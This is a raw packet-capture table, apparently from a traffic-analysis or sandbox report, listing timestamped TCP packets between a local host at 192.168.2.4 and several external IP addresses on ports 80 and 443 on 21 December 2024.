                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.590828896 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.590873003 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.590965033 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.591012955 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.592022896 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.592067003 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.592143059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.592199087 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.592863083 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.592906952 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.592978001 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.593019962 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.593980074 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.594080925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.594158888 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.594207048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.595189095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.595237017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.595319033 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.595451117 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.596204996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.596249104 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.596390963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.596434116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.597565889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.597609043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.597834110 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.597925901 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.598638058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.598680973 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.598790884 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.598826885 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.599750996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.599797964 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.599946022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.599989891 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.600868940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.600913048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.601018906 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.601068974 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.601850033 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.601897001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.602025032 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.602132082 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.603063107 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.603107929 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.603178978 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.603260994 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.603790045 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.603840113 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.603938103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.604020119 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.604692936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.604732037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.604825020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.604861975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.605619907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.605667114 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.605755091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.605796099 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.606561899 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.606611967 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.606682062 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.606726885 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.607486010 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.607542992 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.607606888 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.607645035 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.608318090 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.608395100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.608407974 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.608448982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.609082937 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.609127045 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.609200001 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.609245062 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.609873056 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.609925032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.609977007 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.610022068 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.610685110 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.610745907 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.610815048 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.611047029 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.611737967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.611787081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.611876011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.611922026 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.612567902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.612612009 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.612715960 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.612761974 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.613588095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.613682032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.614284039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.614341021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.614487886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.614526987 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.614768982 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.614816904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.615406036 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.615447998 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.615556955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.615670919 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.616357088 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.616404057 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.616503000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.616558075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.617280006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.617346048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.617376089 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.617419004 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.618079901 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.618263006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.618309021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.619061947 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.619107962 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.619182110 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.619230032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.619895935 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.619966984 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.620016098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.620062113 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.620765924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.620807886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.620894909 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.620934963 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.621793032 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.621834040 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.621944904 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.621984959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.622682095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.622761965 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.622834921 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.622874022 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.623636961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.623740911 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.623780966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.623820066 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.624793053 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.624839067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.624995947 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.625309944 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.626019001 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.626063108 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.626179934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.626235008 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.627171993 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.627216101 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.627289057 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.627543926 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.627996922 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.628040075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.628113985 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.628217936 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.628798962 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.628839016 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.628909111 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.628962040 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.629686117 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.629730940 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.629828930 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.629873037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.630747080 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.630810976 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.630902052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.631042004 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.631547928 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.631650925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.779280901 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.779433012 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.779468060 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.779509068 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.779722929 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.779772997 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.779989004 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.780028105 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.780808926 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.780864000 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.780898094 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.780936956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.781744957 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.781795979 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.781897068 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.781955004 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.782767057 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.782829046 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.782882929 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.782923937 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.783809900 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.783864021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.783902884 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.783945084 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.784761906 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.784934998 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.784986019 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.785752058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.785801888 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.785898924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.785940886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.786767960 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.786813021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.786912918 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.786953926 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.787782907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.787832022 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.787928104 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.787986994 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.788780928 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.788826942 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.788944006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.788983107 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.789791107 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.789833069 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.789940119 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.789978027 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.790817022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:38.790855885 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.272891045 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.273158073 CET4980080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.302515030 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.302551985 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.302613974 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.327853918 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.327872038 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.392873049 CET8049800185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.393419981 CET8049796185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.393522978 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.394575119 CET4980080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.410075903 CET4980080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.529551983 CET8049800185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.568008900 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.568031073 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.568037033 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.568101883 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.568119049 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.568221092 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.578763008 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.578802109 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.578805923 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.578816891 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.729342937 CET8049800185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.729418993 CET4980080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.732633114 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.735909939 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.852510929 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.852557898 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.855333090 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.855391026 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.855609894 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.975079060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.064421892 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.064945936 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.064965963 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.066436052 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.066505909 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.067816973 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.067908049 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.096681118 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.096692085 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.303371906 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.303425074 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.417649984 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.417829037 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.417884111 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.428601980 CET49801443192.168.2.434.226.108.155
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:43.428617954 CET4434980134.226.108.155192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.164799929 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.164899111 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.176728010 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.176848888 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.181921959 CET804980431.41.244.11192.168.2.4
